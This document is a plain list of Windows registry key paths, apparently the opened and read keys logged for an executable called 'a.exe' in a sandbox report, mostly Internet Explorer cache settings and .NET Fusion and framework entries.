HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\a.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6f06001f\475dce40\84\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.EnterpriseServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualC__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Transactions,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\BidInterface\Loader
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\EnableConsoleTracing
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\a_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\a_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_CURRENT_USER
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
